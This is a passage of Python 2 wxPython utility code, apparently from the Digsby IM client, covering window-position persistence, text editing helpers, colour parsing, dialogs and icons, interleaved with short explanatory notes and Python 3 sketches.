p.ptMaxPosition.x = int(d['ptMaxPosition'][0])
p.ptMaxPosition.y = int(d['ptMaxPosition'][1])
p.rcNormalPosition = RECT()
p.rcNormalPosition.left, p.rcNormalPosition.top, p.rcNormalPosition.right, p.rcNormalPosition.bottom = d['rcNormalPosition']
return p
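The WINDOWPLACEMENT helpers above convert between a `ctypes.Structure` and a plain dict so the placement can be JSON-serialized. The same round-trip pattern works for any Structure; this portable sketch defines a POINT-like struct locally rather than using `ctypes.wintypes`, which only exists on Windows:

```python
import ctypes

class POINT(ctypes.Structure):
    _fields_ = [('x', ctypes.c_long), ('y', ctypes.c_long)]

def point_todict(p):
    return {'x': p.x, 'y': p.y}

def point_fromdict(d):
    p = POINT()
    p.x = int(d['x'])
    p.y = int(d['y'])
    return p

# round trip: dict -> struct -> dict
restored = point_todict(point_fromdict({'x': 10, 'y': -3}))
# restored == {'x': 10, 'y': -3}
```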
################################################################################
def DeleteRange(textctrl, b, e):
if b != e:
with textctrl.Frozen():
textctrl.Remove(b, e)
textctrl.InsertionPoint = b
def DeleteWord(textctrl):
'''
Deletes the last word (or part of word) at the cursor.
Commonly bound to Ctrl+Backspace.
TODO: ignores punctuation--like
this.is.a.dotted.word[CTRL+BACKSPACE]
will delete the whole line. is that what we want?
'''
i = textctrl.InsertionPoint
s = textctrl.Value
if not s or i < 1: return
e = i
    while i != 0 and s[i-1] == ' ':
i -= 1
b = s.rfind(' ', 0, i) + 1 if i != 0 else 0
if b == -1:
b = 0
DeleteRange(textctrl, b, e)
def DeleteRestOfLine(textctrl):
'''
Deletes from the cursor until the end of the line.
Emulates Control+K from many Linux and Mac editors.
'''
i = textctrl.InsertionPoint
# find the next newline
j = textctrl.Value[i:].find('\n')
j = textctrl.LastPosition if j == -1 else j + i
# if the cursor is on the last character of the line before a newline,
# just delete the newline
if i == j and j + 1 <= textctrl.LastPosition:
j += 1
DeleteRange(textctrl, i, j)
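The editing logic in DeleteWord and DeleteRestOfLine is independent of wx; extracted as pure string functions (the names below are hypothetical), it can be tested without a text control:

```python
def delete_word(s, i):
    """Return (new_text, new_cursor) after deleting the word left of index i."""
    if not s or i < 1:
        return s, i
    e = i
    while i != 0 and s[i - 1] == ' ':  # skip trailing spaces first
        i -= 1
    b = s.rfind(' ', 0, i) + 1 if i != 0 else 0
    return s[:b] + s[e:], b

def delete_rest_of_line(s, i):
    """Return new_text with everything from i to the next newline removed."""
    j = s.find('\n', i)
    j = len(s) if j == -1 else j
    if i == j and j + 1 <= len(s):
        j += 1  # cursor already at end of line: remove the newline itself
    return s[:i] + s[j:]

# delete_word('hello world', 11) -> ('hello ', 6)
# delete_rest_of_line('ab\ncd', 1) -> 'a\ncd'
```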
if 'wxMac' in wx.PlatformInfo:
AutoDC = wx.PaintDC
else:
AutoDC = wx.AutoBufferedPaintDC
# def to_icon(bitmap):
# return wx.IconFromBitmap(bitmap.WXB)
def to_icon(bitmap, size = None):
if isinstance(bitmap, wx.Image):
bitmap = wx.BitmapFromImage(bitmap)
bitmap = bitmap.WXB
return wx.IconFromBitmap(bitmap.Resized(size) if size is not None else bitmap)
wx.Rect.Pos = new.instancemethod(cgui.RectPosPoint, None, wx.Rect)
from cgui import Subtract as cgui_Subtract
def Rect_Subtract(r, left = 0, right = 0, up = 0, down = 0):
r.x, r.y, r.width, r.height = cgui_Subtract(r, left, right, up, down)
return r
def Rect_SubtractCopy(r, left = 0, right = 0, up = 0, down = 0):
return cgui_Subtract(r, left, right, up, down)
wx.Rect.Subtract = new.instancemethod(Rect_Subtract, None, wx.Rect)
wx.Rect.SubtractCopy = new.instancemethod(Rect_SubtractCopy, None, wx.Rect)
del Rect_Subtract
wx.Rect.AddMargins = new.instancemethod(cgui.RectAddMargins, None, wx.Rect)
# methods for getting/setting "always on top" state for top level windows
#
def GetOnTop(toplevelwin):
'Returns True if this window is always on top, False otherwise.'
s = toplevelwin.WindowStyleFlag
return bool(s & wx.STAY_ON_TOP)
def SetOnTop(toplevelwin, ontop):
'''Sets this window's "always on top" state.'''
if ontop:
flag = toplevelwin.WindowStyleFlag | wx.STAY_ON_TOP
else:
flag = toplevelwin.WindowStyleFlag & ~wx.STAY_ON_TOP
toplevelwin.WindowStyleFlag = flag
def ToggleOnTop(toplevelwin):
toplevelwin.OnTop = not toplevelwin.OnTop
wx.TopLevelWindow.OnTop = property(GetOnTop, SetOnTop)
wx.TopLevelWindow.ToggleOnTop = ToggleOnTop
class FocusTimer(wx.Timer):
def __init__(self, draw = False):
wx.Timer.__init__(self)
self.draw = draw
def Notify(self):
c = self.last_focused = wx.Window.FindFocus()
r = c.ScreenRect if c is not None else wx.Rect()
print 'wx.Window.FindFocus() ->', c, 'at', r
if self.draw:
dc = wx.ScreenDC()
p = wx.RED_PEN
p.SetWidth(4)
dc.SetPen(p)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangleRect(r)
def trackfocus(update_ms = 2000, draw = False):
t = FocusTimer(draw = draw)
t.Start(update_ms)
return t
#
# patch hcenter and vcenter methods into wxRect for centering images/rectangles
#
def VCenter(rect, img):
return rect.y + rect.height / 2 - img.Height / 2
def HCenter(rect, img):
return rect.x + rect.width / 2 - img.Width / 2
def VCenterH(rect, h):
return rect.y + rect.height / 2 - h / 2
def HCenterW(rect, w):
return rect.x + rect.width / 2 - w / 2
def CenterPoint(rect, pt):
w, h = pt
return rect.x + rect.HCenterW(w), rect.y + rect.VCenterH(h)
wx.Rect.VCenter = VCenter
wx.Rect.HCenter = HCenter
wx.Rect.VCenterH = VCenterH
wx.Rect.HCenterW = HCenterW
wx.Rect.CenterPoint = CenterPoint
Image.Image.Width = property(lambda image: image.size[0])
Image.Image.Height = property(lambda image: image.size[1])
class progress_dialog(object):
'Threadsafe progress dialog.'
def __init__(self, message, title):
self.stopped = False
# callback to the GUI thread for dialog creation
wx.CallAfter(self.create_dialog, message, title)
def create_dialog(self, message, title):
# dialog will not have a close button or system menu
self.dialog = d = wx.Dialog(None, -1, title, style = wx.CAPTION)
d.Sizer = s = wx.BoxSizer(wx.VERTICAL)
self.gauge = wx.Gauge(d, -1, style = wx.GA_HORIZONTAL)
s.Add(wx.StaticText(d, -1, message), 0, wx.EXPAND | wx.ALL, 10)
s.Add(self.gauge, 0, wx.EXPAND | wx.ALL, 10)
self.timer = wx.PyTimer(self.on_timer)
self.timer.StartRepeating(300)
self.gauge.Pulse()
s.Layout()
d.Fit()
d.CenterOnScreen()
d.Show()
def on_timer(self):
if self.stopped:
self.dialog.Destroy()
self.timer.Stop()
del self.dialog
del self.timer
else:
self.gauge.Pulse()
def stop(self):
self.stopped = True
def yes_no_prompt(title, text, default = True):
flags = wx.NO_DEFAULT * (not default)
result = wx.MessageBox(text, title, style = wx.YES_NO | flags)
if result == wx.YES:
return True
elif result == wx.NO:
return False
else:
return None
def ShowImage(b, title = ''):
'''
Displays the given wxImage, wxBitmap, PIL image, or skin region on screen
in a frame.
'''
title = title + ' ' + repr(b)
b = getattr(b, 'WXB', b)
f = wx.Frame(None, title = title, style = wx.DEFAULT_FRAME_STYLE | wx.FULL_REPAINT_ON_RESIZE)
if isinstance(b, wx.Bitmap):
f.SetClientRect((0, 0, b.Width, b.Height))
def paint_bitmap(e):
dc = wx.AutoBufferedPaintDC(f)
dc.Brush, dc.Pen = wx.CYAN_BRUSH, wx.TRANSPARENT_PEN
dc.DrawRectangleRect(f.ClientRect)
dc.DrawBitmap(b, 0, 0, True)
f.Bind(wx.EVT_PAINT, paint_bitmap)
f.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
elif isinstance(b, wx.Colour):
f.SetBackgroundColour(b)
f.SetClientRect((0, 0, 200, 200))
else:
f.SetClientRect((0, 0, 200, 200))
def paint_skinregion(e):
dc = wx.AutoBufferedPaintDC(f)
dc.Brush, dc.Pen = wx.WHITE_BRUSH, wx.TRANSPARENT_PEN
dc.DrawRectangleRect(f.ClientRect)
b.Draw(dc, f.ClientRect)
f.Bind(wx.EVT_PAINT, paint_skinregion)
f.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
f.CenterOnScreen()
f.Show()
# allow ".Show()" on any image or color object to display it on screen
Image.Image.Show = wx.Image.Show = wx.Bitmap.Show = wx.Icon.Show = wx.Colour.Show = ShowImage
def wx_prop(attrname, field='Value', set_cleanup=lambda x:x, get_cleanup=lambda x:x):
def set(self, val):
setattr(getattr(self, attrname), field, set_cleanup(val))
def get(self):
return get_cleanup(getattr(getattr(self, attrname), field))
return property(get, set)
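`wx_prop` is a property factory: the returned property's getter and setter delegate to a named field on a named sub-attribute, with optional value transforms. The same pattern without wx, using hypothetical `Inner`/`Outer` classes:

```python
def delegate_prop(attrname, field, to_inner=lambda v: v, from_inner=lambda v: v):
    # build a property that forwards to getattr(self, attrname).<field>
    def fset(self, value):
        setattr(getattr(self, attrname), field, to_inner(value))
    def fget(self):
        return from_inner(getattr(getattr(self, attrname), field))
    return property(fget, fset)

class Inner(object):
    value = ''

class Outer(object):
    def __init__(self):
        self.box = Inner()
    text = delegate_prop('box', 'value', to_inner=str.strip)

o = Outer()
o.text = '  hi  '
# o.text == 'hi' and o.box.value == 'hi'
```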
def TextEntryDialog(message, caption = '', default_value = '', password = False, limit=1024):
style = wx.OK | wx.CANCEL | wx.CENTRE
if password:
style |= wx.TE_PASSWORD
TED = wx.TextEntryDialog(None, message, caption, default_value, style = style)
return TED
def GetTextFromUser_FixInput(val, limit):
if limit is not None:
if len(val) > limit:
print >>sys.stderr, "Data is %d bytes long, cutting to %d bytes" % (len(val), limit)
val = val[:limit]
return val
def GetTextFromUser(message, caption = '', default_value = '', password = False, limit=1024):
try:
TED = TextEntryDialog(message, caption, default_value, password, limit)
id = TED.ShowModal()
val = TED.Value
finally:
TED.Destroy()
val = GetTextFromUser_FixInput(val, limit)
return val if id == wx.ID_OK else None
def make_okcancel(name, cls):
class okcancel_class(cls):
'Wraps any component in a OK/Cancel dialog.'
dialog_style = wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX
def __init__(self, parent, id=-1,
title=None,
ok_caption = '',
cancel_caption = '',
style = dialog_style):
if title is None:
title = _("Confirm")
cls.__init__(self, parent, id, title=title, style=style)
self.OKButton = ok = wx.Button(self, wx.ID_OK, ok_caption)
cancel = wx.Button(self, wx.ID_CANCEL, cancel_caption)
if config.platform == 'win':
button_order = [ok, cancel]
else:
button_order = [cancel, ok]
self._button_sizer = hbox = wx.BoxSizer(wx.HORIZONTAL)
if hasattr(self, 'ExtraButtons'):
ctrl = self.ExtraButtons()
if ctrl is not None:
hbox.Add(ctrl, 0, wx.EXPAND | wx.ALL, 5)
hbox.AddStretchSpacer(1)
for button in button_order:
hbox.Add(button, 0, wx.ALL, 5)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(hbox, 0, wx.ALL | wx.EXPAND, 7)
self.vbox = vbox
self.SetSizer(vbox)
self.Layout()
ok.SetDefault()
def set_component(self, c, border=7, line=False):
self.vbox.Insert(0, c, 1, wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border)
if line:
self.vbox.Insert(1, wx.StaticLine(self), 0, wx.EXPAND | wx.LEFT | wx.RIGHT, border)
self.Layout()
@property
def ButtonSizer(self):
return self._button_sizer
okcancel_class.__name__ = name
return okcancel_class
OKCancelDialog = make_okcancel('OKCancelDialog', wx.Dialog)
OKCancelFrame = make_okcancel('OKCancelFrame', wx.Frame)
class Link(wx.HyperlinkCtrl):
def __init__(self, parent, label, url):
wx.HyperlinkCtrl.__init__(self, parent, -1, label, url)
self.HoverColour = self.VisitedColour = self.NormalColour
class NonModalDialogMixin(object):
def ShowWithCallback(self, cb=None):
self.cb = cb
self.Bind(wx.EVT_BUTTON, self.on_button)
self.Show()
self.Raise()
def on_button(self, e):
ok = e.Id == wx.ID_OK
self.Hide()
cb, self.cb = self.cb, None
if cb is not None:
import util
with util.traceguard:
cb(ok)
self.Destroy()
class SimpleMessageDialog(OKCancelDialog, NonModalDialogMixin):
def __init__(self, parent, title, message,
icon, ok_caption='', cancel_caption='',
style=None,
link=None,
wrap=None):
if style is None:
style = self.dialog_style
if link is not None:
def ExtraButtons():
self._panel = wx.Panel(self)
return Link(self, link[0], link[1])
self.ExtraButtons = ExtraButtons
OKCancelDialog.__init__(self, parent, title=title,
ok_caption=ok_caption, cancel_caption=cancel_caption,
style=style)
self.icon = icon
if icon is not None:
self.SetFrameIcon(self.icon)
p = self._panel
p.Bind(wx.EVT_PAINT, self.OnPanelPaint)
main_sizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.BoxSizer(wx.HORIZONTAL)
p.SetBackgroundColour(wx.WHITE)
static_text = wx.StaticText(p, -1, message)
sizer.AddSpacer((60, 20))
sizer.Add(static_text, 1, wx.EXPAND)
main_sizer.Add(sizer, 1, wx.EXPAND | wx.ALL, 10)
main_sizer.Add((5,5))
p.SetSizer(main_sizer)
self.set_component(p, border=0)
if wrap is not None:
static_text.Wrap(wrap)
self.Fit()
def OnPanelPaint(self, e):
dc = wx.PaintDC(self._panel)
icon = self.icon
if icon is not None:
dc.DrawBitmap(icon, 20, 14, True)
def ExtraButtons(self):
self._panel = wx.Panel(self)
class UpgradeDialog(SimpleMessageDialog):
dialog_style = SimpleMessageDialog.dialog_style & ~wx.CLOSE_BOX
def __init__(self, *a, **k):
super(UpgradeDialog, self).__init__(*a, **k)
self.SetEscapeId(wx.ID_NONE)
@classmethod
def show_dialog(cls, parent, title, message, success=None):
wx.CallAfter(cls.do_show_dialog, parent, title, message, success)
@classmethod
def do_show_dialog(cls, parent, title, message, success=None):
dialog = cls(parent, title=title, message=message)
dialog.ShowWithCallback(success)
try:
from cgui import FindTopLevelWindow
except ImportError:
print >> sys.stderr, "WARNING: using slow FindTopLevelWindow"
def FindTopLevelWindow(window):
return window if window.TopLevel else FindTopLevelWindow(window.Parent)
# wx.Window.GetNormalRect : return the non maximized dimensions of a window
try:
from cgui import GetNormalRect
except ImportError:
def GetNormalRect(win):
return win.Rect
wx.WindowClass.NormalRect = property(GetNormalRect)
wx.WindowClass.GetNormalRect = new.instancemethod(GetNormalRect, None, wx.WindowClass)
wx.WindowClass.Top = property(FindTopLevelWindow)
def edit_list(parent=None, obj_list=None, title="Editing List"):
if not isinstance(obj_list, list):
obj_list = []
diag = OKCancelDialog(wx.GetTopLevelParent(parent), title=title)
t = type(obj_list[0]) if len(obj_list) else None
textctrl = wx.TextCtrl(diag, value = ','.join([str(i) for i in obj_list]))
diag.set_component(textctrl)
textctrl.MinSize = (300, -1)
diag.Fit()
textctrl.SetFocus()
textctrl.SetInsertionPointEnd()
result = diag.ShowModal() == wx.ID_OK
if t is None:
t = int if all([s.isdigit() for s in textctrl.Value.split(',')]) else str
return result, [t(s.strip()) for s in textctrl.Value.split(',')] if len(textctrl.Value) else []
try:
import wx.gizmos as gizmos
except ImportError:
def edit_string_list(parent=None, obj_list=['one', 'two', 'three'], title="Editing List"):
log.critical('no wx.gizmos')
return edit_list(parent, obj_list, title)
else:
def edit_string_list(parent=None, obj_list=['one', 'two', 'three'], title="Editing List"):
diag = OKCancelDialog(wx.GetTopLevelParent(parent), title=title)
t = type(obj_list[0])
elb = gizmos.EditableListBox(diag, -1, title)
elb.SetStrings([unicode(elem) for elem in obj_list])
diag.set_component(elb)
return diag.ShowModal() == wx.ID_OK, [t(s) for s in elb.GetStrings()]
from wx import Color, ColourDatabase, NamedColor
from binascii import unhexlify
from types import NoneType
def get_wxColor(c):
if isinstance(c, (NoneType, Color)):
return c
elif isinstance(c, basestring):
if c[0:2].lower() == color_prefix.lower():
# a hex string like "0xabcdef"
return Color(*(struct.unpack("BBB", unhexlify(c[2:8])) + (255,)))
elif ColourDatabase().Find(c).Ok():
# a color name
return NamedColor(c)
else:
try: c = int(c)
except ValueError: pass
if isinstance(c, int):
# an integer
return Color((c >> 16) & 0xff, (c >> 8) & 0xff, c & 0xff, (c >> 24) or 255)
raise ValueError('error: %r is not a valid color' % c)
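`get_wxColor` accepts hex strings like `"0xabcdef"`, named colors, and packed ints. The hex and int branches can be sketched without wx, with an (r, g, b, a) tuple standing in for `wx.Colour` (the name `parse_color` is hypothetical):

```python
import struct
from binascii import unhexlify

def parse_color(c):
    """Return an (r, g, b, a) tuple for '0xRRGGBB' strings or packed ints."""
    if isinstance(c, str) and c[:2].lower() == '0x':
        # unpack three unsigned bytes from the hex digits, default alpha 255
        return struct.unpack('BBB', unhexlify(c[2:8])) + (255,)
    if isinstance(c, int):
        # alpha lives in the top byte; 0 there means fully opaque
        return ((c >> 16) & 0xff, (c >> 8) & 0xff, c & 0xff, (c >> 24) or 255)
    raise ValueError('error: %r is not a valid color' % (c,))

# parse_color('0xabcdef') == (171, 205, 239, 255)
```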
colorfor = get_wxColor
LOCAL_SETTINGS_FILE = 'digsbylocal.ini'
class MyConfigParser(ConfigParser):
def save(self):
import util
with util.traceguard:
parent = local_settings_path().parent
if not parent.isdir():
parent.makedirs()
lsp = local_settings_path()
try:
with open(lsp, 'w') as f:
self.write(f)
except Exception, e:
log.error('Error saving file %r. Error was: %r', lsp, e)
def iteritems(self, section):
return ((k, self.value_transform(v)) for k, v in ConfigParser.items(self, section))
    def items(self, section):
        return list(self.iteritems(section))
def _interpolate(self, section, option, rawval, vars):
try:
value = ConfigParser._interpolate(self, section, option, rawval, vars)
except TypeError:
value = rawval
return value
def value_transform(self, v):
import util
return {'none': None,
'true': True,
'false': False}.get(util.try_this(lambda: v.lower(), None), v)
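`value_transform` above maps the strings 'none'/'true'/'false' (case-insensitively) to Python values and passes everything else through unchanged. The same dict-with-`.get` pattern in isolation, with the `try_this` helper replaced by an explicit try/except:

```python
def value_transform(v):
    # non-strings fall through untouched because lower() fails on them
    try:
        key = v.lower()
    except AttributeError:
        return v
    return {'none': None, 'true': True, 'false': False}.get(key, v)

# value_transform('TRUE') is True; value_transform('42') == '42'
```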
def local_settings_path():
import stdpaths
return stdpaths.userlocaldata / LOCAL_SETTINGS_FILE
_global_ini_parser = None
def local_settings():
global _global_ini_parser
if _global_ini_parser is None:
_global_ini_parser = MyConfigParser()
lsp = local_settings_path()
try:
_global_ini_parser.read(lsp)
except Exception, e:
log.error('There was an error loading file %r. The error was %r.', lsp, e)
return _global_ini_parser
def getDisplayHashString():
'''
Returns a unique string for the current monitor/resolution configuration.
Used below in save/loadWindowPos.
The rationale is that using things like Remote Desktop can result in the
window remembering a location that won't work on a differently sized
display. This way you only position the window once on each display
configuration and be done with it.
'''
return '{%s}' % ', '.join('<(%s, %s): %sx%s>' % tuple(m.Geometry) for m in Monitor.All())
def saveWindowPos(win, uniqueId=""):
'''
Saves a window's position to the config file.
'''
cfg = local_settings()
section = windowId(win.Name, uniqueId)
if not cfg.has_section(section):
cfg.add_section(section)
if wxMSW:
placement = GetWindowPlacement(win)
# on win7, if a window is Aero Snapped, GetWindowPlacement will return
# it's "unsnapped" size. we want to save the size of the window as it
# is now, though--so grab the size from win.Rect and use that.
if cgui.isWin7OrHigher() and not win.IsMaximized() and not win.IsIconized():
placement_set_size(placement, win.Rect.Size)
cfg.set(section, 'placement', json.dumps(placement))
else:
rect = GetNormalRect(win)
sz, p = rect.GetSize(), rect.GetPosition()
for k, v in [("x", p.x),
("y", p.y),
("w", sz.width),
("h", sz.height),
('maximized', win.IsMaximized())]:
cfg.set(section, k, str(v))
cfg.save()
defSizes = {
'Buddy List': (280, 600),
'IM Window': (420, 330),
}
def windowId(windowName, uniqueId):
from common import profile
username = getattr(profile, 'username', None)
if not username:
username = getattr(wx.FindWindowByName('Digsby Login Window'), 'username', '_')
return ' '.join([windowName, uniqueId, username, getDisplayHashString()])
def placement_set_size(placement, size):
np = placement['rcNormalPosition']
right = np[0] + size.width
bottom = np[1] + size.height
placement['rcNormalPosition'] = [np[0], np[1], right, bottom]
def preLoadWindowPos(windowName, uniqueId="", position_only = False, defaultPos = None, defaultSize = None):
# save based on classname, and any unique identifier that is specified
section = windowId(windowName, uniqueId)
if defaultPos is not None:
doCenter = defaultPos == 'center'
hasDefPos = not doCenter
else:
hasDefPos = False
doCenter = False
    size = defaultSize if defaultSize is not None else wx.DefaultSize  # (450, 400)
pos = defaultPos if hasDefPos else wx.DefaultPosition
style = 0
try:
cfg = local_settings()
hassection = cfg.has_section(section)
except Exception:
print_exc()
hassection = False
placement = None
if wxMSW:
if hassection:
import util
with util.traceguard:
placement = json.loads(cfg.get(section, 'placement'))
if position_only:
placement_set_size(placement, size)
if hassection and not position_only:
try:
size = Size(cfg.getint(section, "w"), cfg.getint(section, "h"))
except Exception:
pass
#TODO: this isn't expected to work anymore with IM windows, needs to
            #be removed once everything else is moved to use SetPlacement
#print_exc()
if doCenter:
mon = Monitor.GetFromRect(wx.RectPS(wx.Point(0, 0), size)) #@UndefinedVariable
pos = wx.Point(*mon.ClientArea.CenterPoint(size))
if hassection:
try:
pos = Point(cfg.getint(section, "x"), cfg.getint(section, "y"))
except Exception:
pass
#TODO: this isn't expected to work anymore with IM windows, needs to
            #be removed once everything else is moved to use SetPlacement
#print_exc()
import util
max = util.try_this(lambda: cfg.getboolean(section, "maximized"), False) if hassection else False
if max:
style |= wx.MAXIMIZE
return dict(style = style, size = size, pos = pos), placement
def loadWindowPos(win, uniqueId="", position_only = False, defaultPos = None, defaultSize = None):
'''
Loads a window's position from the default config file.
'''
wininfo, placement = preLoadWindowPos(win.Name, uniqueId, position_only, defaultPos, defaultSize or win.Size)
if placement is not None:
SetWindowPlacement(win, placement)
else:
if not position_only:
win.SetRect(wx.RectPS(wininfo['pos'], wininfo['size']))
else:
win.Position = wininfo['pos']
# if wininfo['style'] & wx.MAXIMIZE:
# win.Maximize()
win.EnsureInScreen()
def persist_window_pos(frame, close_method=None, unique_id="", position_only=False, defaultPos=None, defaultSize=None, nostack=False):
    '''
    To make a frame remember where it was, call this function on it in its
    constructor.
    '''
    def _persist_close(e):
        saveWindowPos(frame, unique_id)
        close_method(e) if close_method is not None else e.Skip(True)

    frame.Bind(wx.EVT_CLOSE, _persist_close)
    loadWindowPos(frame, unique_id, position_only, defaultPos=defaultPos, defaultSize=defaultSize)

    if nostack:
        frame.EnsureNotStacked()
def TransparentBitmap(size):
    w, h = max(size[0], 1), max(size[1], 1)
    return wx.TransparentBitmap(w, h)

def toscreen(bmap, x, y):
    wx.ScreenDC().DrawBitmap(bmap, x, y)
def bbind(window, **evts):
    '''
    Shortcut for binding wxEvents.

    Instead of:

        self.Bind(wx.EVT_PAINT, self.on_paint)
        self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_paint_background)
        self.Bind(wx.EVT_SET_FOCUS, self.on_focus)

    Use this:

        self.BBind(PAINT = self.on_paint,
                   ERASE_BACKGROUND = self.on_paint_background,
                   SET_FOCUS = self.on_focus)
    '''
    bind = window.Bind
    for k, v in evts.iteritems():
        bind(getattr(wx, 'EVT_' + k), v)

wx.WindowClass.BBind = bbind
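The keyword-to-event dispatch in `bbind` can be demonstrated without wx at all. The following sketch uses an illustrative stand-in namespace (`FakeWX`) and a demo name (`bbind_demo`) so nothing in the real module is shadowed:

```python
class FakeWX(object):
    # stand-in for the wx module; the attribute values are arbitrary
    EVT_PAINT = 'paint-event'
    EVT_SET_FOCUS = 'focus-event'

def bbind_demo(bind, namespace, **evts):
    # resolve each keyword like PAINT -> namespace.EVT_PAINT and bind it
    for name, handler in evts.items():
        bind(getattr(namespace, 'EVT_' + name), handler)

bound = {}
bbind_demo(lambda evt, cb: bound.__setitem__(evt, cb), FakeWX,
           PAINT=lambda e: None, SET_FOCUS=lambda e: None)
print(sorted(bound))  # ['focus-event', 'paint-event']
```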
def EnsureInScreen(win, mon=None, client_area=True):
    # only look the monitor up if the caller didn't supply one
    if mon is None:
        mon = Monitor.GetFromWindow(win)

    if mon:
        rect = mon.ClientArea if client_area else mon.Geometry
        win.SetRect(rect.Clamp(win.Rect))
    else:
        win.CentreOnScreen()

wx.WindowClass.EnsureInScreen = EnsureInScreen
def FitInScreen(win, mon=None):
    '''
    Like wx.Window.Fit(), except also ensures the window is within the client
    rectangle of its current Display.
    '''
    win.Fit()
    EnsureInScreen(win, mon)

wx.WindowClass.FitInScreen = FitInScreen
def build_button_sizer(save, cancel=None, border=5):
    'Builds a standard platform specific button sizer.'
    # Only because wxStdDialogButtonSizer.Realize crashed the Mac
    sz = wx.BoxSizer(wx.HORIZONTAL)
    sz.AddStretchSpacer(1)
    addbutton = lambda b: sz.Add(b, 0, (wx.ALL & ~wx.TOP) | wx.ALIGN_RIGHT, border)
    mac = 'wxMac' in wx.PlatformInfo

    import util.primitives.funcs as funcs
    if save and cancel:
        funcs.do(addbutton(b) for b in ([cancel, save] if mac else [save, cancel]))
    else:
        addbutton(save)

    return sz
_tinyoffsets = ((-1, 0), (1, 0), (1, -1), (1, 1), (-1, -1), (-1, 1))

def draw_tiny_text(image, text, outline='black', fill='white'):
    image = getattr(image, 'PIL', image).copy()

    # Load the pixel font.
    font = load_tiny_font()
    if font is None:
        return image

    drawtext = ImageDraw.Draw(image).text
    size = font.getsize(text)
    x, y = image.size[0] - size[0], image.size[1] - size[1]

    if outline:
        # shift the text one pixel in several directions to create an outline
        for a, b in _tinyoffsets:
            drawtext((x+a, y+b), text, fill=outline, font=font)

    drawtext((x, y), text, fill=fill, font=font)
    return image
_tinyfont = None

def load_tiny_font():
    global _tinyfont

    if _tinyfont == -1:
        # There was an error loading the pixel font before.
        return None
    elif _tinyfont is None:
        try:
            import locale
            from gui import skin
            _tinyfont = ImageFont.truetype((skin.resourcedir() / 'slkscr.ttf').encode(locale.getpreferredencoding()), 9)
        except Exception:
            print_exc()
            _tinyfont = -1
            return None

    return _tinyfont
#@lru_cache(10)
def add_image_text(wxbitmap, text):
    return draw_tiny_text(wxbitmap, unicode(text)).WXB
def rect_with_negatives(rect, boundary):
    '''
    Allows rectangles specified in negative coordinates within some boundary.

    Parameters:
      rect:     a sequence of four numbers specifying a rectangle
      boundary: a sequence of two numbers, a width and height, representing the
                boundary rectangle

    Returns a sequence of four numbers: a new rectangle which takes any negative
    numbers from the original rectangle and adds them to the boundary rectangle.
    '''
    if len(rect) != 4 or len(boundary) != 2:
        raise TypeError('parameters are (x,y,w,h) and (w,h)')

    ret = list(rect)
    for i in xrange(len(ret)):
        if ret[i] < 0:
            ret[i] += boundary[i % 2]
    return ret
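Restated under a demo name (and with Python 3's `range` so it runs standalone), the transformation is easy to check:

```python
def rect_with_negatives_demo(rect, boundary):
    ret = list(rect)
    for i in range(len(ret)):
        if ret[i] < 0:
            ret[i] += boundary[i % 2]  # even indices use the width, odd the height
    return ret

# a 100x50 rect whose x is given relative to the right edge of an 800x600 area
print(rect_with_negatives_demo((-110, 20, 100, 50), (800, 600)))  # [690, 20, 100, 50]
```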
class Frozen(object):
    '''
    "with" statement context manager for freezing wx.Window GUI elements
    '''
    def __init__(self, win):
        self.win = win

    def __enter__(self):
        self.win.Freeze()

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.win.Thaw()
        del self.win

wx.WindowClass.Frozen = lambda win: Frozen(win)
wx.WindowClass.FrozenQuick = lambda win: Frozen(win)
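The Freeze/Thaw pairing guarantee is the whole point of the context manager: `Thaw` runs on exit even if the body raises. A self-contained sketch with a stub window (both names are illustrative, not part of wx):

```python
class StubWindow(object):
    # minimal stand-in for a wx.Window that counts Freeze/Thaw calls
    def __init__(self):
        self.freeze_depth = 0
    def Freeze(self):
        self.freeze_depth += 1
    def Thaw(self):
        self.freeze_depth -= 1

class FrozenDemo(object):
    def __init__(self, win):
        self.win = win
    def __enter__(self):
        self.win.Freeze()
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.win.Thaw()
        del self.win

w = StubWindow()
with FrozenDemo(w):
    assert w.freeze_depth == 1   # repaints suppressed inside the block
print(w.freeze_depth)  # 0 -- Thaw ran on exit
```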
from wx import IconFromBitmap

GetMetric = wx.SystemSettings.GetMetric

_win7bigicon = None

def SetFrameIcon(frame, bitmap):
    "Given any Bitmap/Image/PILImage, sets this frame's icon."
    small_w, small_h = GetMetric(wx.SYS_SMALLICON_X), GetMetric(wx.SYS_SMALLICON_Y)
    big_w, big_h = GetMetric(wx.SYS_ICON_X), GetMetric(wx.SYS_ICON_Y)

    if small_w == -1:
        small_w = 16
    if small_h == -1:
        small_h = 16
    if big_w == -1:
        big_w = 32
    if big_h == -1:
        big_h = 32

    if isinstance(bitmap, wx.IconBundle):
        bundle = bitmap
    elif isinstance(bitmap, list):
        bundle = wx.IconBundle()
        for b in bitmap:
            if isinstance(b, wx.Icon):
                bundle.AddIcon(b)
            else:
                bundle.AddIcon(IconFromBitmap(b.PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB))
    else:
        small_bitmap = bitmap.PIL.ResizedSmaller(small_w).ResizeCanvas(small_w, small_h).WXB

        if cgui.isWin7OrHigher():
            # On Windows 7, always use the Digsby icon for the 32x32 version,
            # so that our application icon in the taskbar always shows as the Digsby logo.
            global _win7bigicon
            if _win7bigicon is None:
                from gui import skin
                _win7bigicon = skin.get('AppDefaults.TaskBarIcon').PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB
            large_bitmap = _win7bigicon
        else:
            large_bitmap = bitmap.PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB

        bundle = wx.IconBundle()
        bundle.AddIcon(IconFromBitmap(large_bitmap))
        bundle.AddIcon(IconFromBitmap(small_bitmap))

    frame.SetIcons(bundle)

wx.TopLevelWindow.SetFrameIcon = SetFrameIcon
def snap_pref(win):
    'Makes a window obey the windows.sticky preference. (The window snaps to edges.)'
    from common import profile

    # needs to import snap to patch SetSnap into TopLevelWindow
    import gui.snap

    if profile.prefs:
        linked = profile.prefs.link('windows.sticky', win.SetSnap)

        def on_destroy(e):
